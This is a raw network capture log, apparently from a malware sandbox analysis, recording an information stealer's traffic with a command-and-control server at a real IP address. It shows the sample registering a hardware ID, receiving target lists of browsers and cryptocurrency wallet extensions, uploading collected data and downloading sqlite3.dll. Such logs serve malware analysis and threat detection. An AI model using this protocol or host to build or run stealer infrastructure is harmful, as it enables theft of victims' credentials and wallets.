Nov 15, 2024 14:09:06.848272085 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 15, 2024 14:09:07.785329103 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:09:07.787697077 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGC Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 43 46 32 31 31 36 46 38 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="hwid"BCCF2116F8A11720009369------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="build"mars------BFHJECAAAFHIJKFIJEGC--
Nov 15, 2024 14:09:08.091519117 CET	407	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:07 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 6a 64 68 5a 44 4a 6a 5a 6a 67 77 4d 6d 45 79 5a 6a 6c 68 59 54 4d 31 4d 44 45 7a 4e 7a 6b 33 5a 6d 56 6b 59 57 46 6d 4d 54 4e 68 4e 6d 55 32 5a 6a 4e 6c 4f 44 46 6c 4d 57 51 30 4e 54 46 6c 4e 54 63 77 4d 6a 45 33 4d 7a 42 68 5a 57 45 31 4d 6a 6b 78 4d 6d 4d 78 59 6a 5a 68 4e 54 49 77 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NjdhZDJjZjgwMmEyZjlhYTM1MDEzNzk3ZmVkYWFmMTNhNmU2ZjNlODFlMWQ0NTFlNTcwMjE3MzBhZWE1MjkxMmMxYjZhNTIwfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 15, 2024 14:09:08.102161884 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDA Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="message"browsers------BKJJJDHDGDAAKECAKJDA--
Nov 15, 2024 14:09:08.391510010 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:08 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Nov 15, 2024 14:09:08.391539097 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Nov 15, 2024 14:09:08.392666101 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKK Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="message"plugins------DAFBGHCAKKFCAKEBKJKK--
Nov 15, 2024 14:09:08.685065031 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:08 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 15, 2024 14:09:08.685096979 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Nov 15, 2024 14:09:08.685118914 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Nov 15, 2024 14:09:08.685352087 CET	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Nov 15, 2024 14:09:08.685369015 CET	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Nov 15, 2024 14:09:08.685410976 CET	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Nov 15, 2024 14:09:08.687020063 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHID Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 2d 2d 0d 0a Data Ascii: ------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="message"fplugins------IIEHCFIDHIDGIDHJEHID--
Nov 15, 2024 14:09:08.976816893 CET	335	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:08 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 15, 2024 14:09:09.043133974 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE Host: 185.215.113.206 Content-Length: 6307 Connection: Keep-Alive Cache-Control: no-cache
Nov 15, 2024 14:09:09.043134928 CET	6307	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 15, 2024 14:09:09.845065117 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:09:10.086363077 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 15, 2024 14:09:10.374176025 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:10 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 15, 2024 14:09:10.374187946 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Nov 15, 2024 14:09:10.374198914 CET	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Nov 15, 2024 14:09:10.374284029 CET	1236	IN	Data Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31 Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49752	185.215.113.206	80	4940	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:09:18.817615032 CET	629	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGI Host: 185.215.113.206 Content-Length: 427 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 